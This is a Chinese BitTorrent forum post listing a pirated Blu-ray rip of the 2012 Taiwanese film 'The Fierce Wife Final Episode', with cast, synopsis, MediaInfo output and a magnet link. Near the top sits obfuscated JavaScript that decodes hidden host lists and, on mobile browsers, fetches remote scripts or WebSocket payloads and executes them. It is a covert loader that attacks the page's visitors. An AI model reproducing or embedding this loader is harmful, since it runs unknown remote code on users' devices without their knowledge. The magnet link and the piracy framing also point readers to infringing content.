犀利人妻[国语配音/中文字幕].The.Fierce.Wife.Final.Episode.2012.1080p.BluRay.x265.10bit.DTS 5.07GB

版主小s 15天前 490

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 犀利人妻 / 犀利人妻电影版 / The Fierce Wife Final Episode

◎片 名 最終回:幸福男·不難

◎年 代 2012

◎产 地 中国台湾

◎类 别 爱情

◎语 言 汉语普通话

◎上映日期 2012-12-31(中国大陆) / 2012-08-17(中国台湾)

◎IMDb链接 https://www.imdb.com/title/tt2455730/

◎豆瓣评分 5.5/10 (6728人评价)

◎豆瓣链接 https://movie.douban.com/subject/10461368/

◎片 长 109分钟

◎导 演 王珮华 Peihua Wang (id:1325526)

王仁里 Renli Wang (id:1325531)

◎编 剧 杨海薇 Haiwei Yang (id:1320819)

陈慧如 Kelly Chen (id:1319510)

王佩华 Peihua Wang (id:1325698)

洪立妍 Liyan Hong (id:1325699)

◎演 员 隋棠 Sonia Sui (id:1275764)

温升豪 James Wen (id:1275740)

王宥胜 Chris Wang (id:1314202)

小小彬 Xiao Xiao Bin (id:1276012)

蔡淑臻 Janel Tsai (id:1317634)

朱芯仪 Amanda Chu (id:1316090)

马念先 Nien-Hsien Ma (id:1274681)

唐绮阳 Jesse Tang (id:1325532)

李沛旭 Patrick Lee (id:1323062)

蔡昌宪 Chang-Hsien Tsai (id:1315231)

车亮逸 Randy Che (id:1350598)

汤湘竹 Shiang-Chu Tang (id:1298902)

◎标 签 爱情 / 台湾电影 / 台湾 / 隋棠 / 犀利人妻 / 2012 / 宥胜 / 溫昇豪

◎简 介

谢安真(隋棠 饰),离婚四年,单身四年,身兼职业OL与家庭主妇两种身分的她,将生活中的一切都打理得井然有序。女儿眼中的好妈妈、同事眼中的好上司、朋友眼中的好姐妹,但,她又会是谁的“好情人”呢? 虽然对爱情仍然有些渴望,安真总用自己的生活很充实、很满足、很幸福来当藉口,因此,她与天蔚(宥胜 饰)还是一直维持着“好朋友”的关系。但,连安真自己也没发现,她只是没有勇气,没有勇气再次投入一段“甜蜜却随时可能破碎的爱情” 。在安真苦恼于是否该接受天蔚的感情时,前夫瑞凡(温升豪 饰)却在此时出现,再次对她展开追求。 在“亲情”与“爱情”、“安心”与“开心”、“习惯”与“改变”之间,安真是否能够把握当下的幸福,勇敢走向能让她发自内心微笑的那个人呢? 幸福,真有么困难吗?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 217883626896114278576046433372989730266 (0xA3EADC325673251B670F75DCB386ADDA)

  4. Complete name : The.F[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.07 GiB

  8. Duration : 1 h 48 min

  9. Overall bit rate : 6 692 kb/s

  10. Movie name : The Fierce Wife Final Episode 2012

  11. Encoded date : UTC 2021-10-06 03:05:42

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 48 min

  23. Bit rate : 5 159 kb/s

  24. Width : 1 920 pixels

  25. Height : 816 pixels

  26. Display aspect ratio : 2.35:1

  27. Frame rate mode : Constant

  28. Frame rate : 23.976 (24000/1001/53354) FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.137

  33. Stream size : 3.91 GiB (77%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=16.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 48 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 16 bits

  52. Compression mode : Lossy

  53. Stream size : 1.14 GiB (23%)

  54. Title : Mandarin

  55. Language : Chinese

  56. Default : Yes

  57. Forced : No

  58. Original source medium : Blu-ray


  59. Text #1

  60. ID : 3

  61. ID in the original source medium : 4608 (0x1200)

  62. Format : PGS

  63. Muxing mode : zlib

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 43 min

  67. Bit rate : 23.2 kb/s

  68. Count of elements : 2282

  69. Stream size : 17.2 MiB (0%)

  70. Title : cht

  71. Language : Chinese

  72. Default : No

  73. Forced : No

  74. Original source medium : Blu-ray


  75. Text #2

  76. ID : 4

  77. ID in the original source medium : 4609 (0x1201)

  78. Format : PGS

  79. Muxing mode : zlib

  80. Codec ID : S_HDMV/PGS

  81. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration : 1 h 43 min

  83. Bit rate : 27.2 kb/s

  84. Count of elements : 2282

  85. Stream size : 20.2 MiB (0%)

  86. Language : English

  87. Default : No

  88. Forced : No

  89. Original source medium : Blu-ray


  90. Menu

  91. 00:00:00.000 : Chapter 01

  92. 00:09:02.833 : Chapter 02

  93. 00:20:17.925 : Chapter 03

  94. 00:31:03.778 : Chapter 04

  95. 00:39:55.893 : Chapter 05

  96. 00:50:37.367 : Chapter 06

  97. 00:58:55.365 : Chapter 07

  98. 01:07:45.436 : Chapter 08

  99. 01:19:23.884 : Chapter 09

  100. 01:27:30.078 : Chapter 10

  101. 01:32:59.115 : Chapter 11


TAGS 爱情

磁力链:
  • magnet:?xt=urn:btih:36F983BC92250AE5DA46BF59B13112ACE473C2FF
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回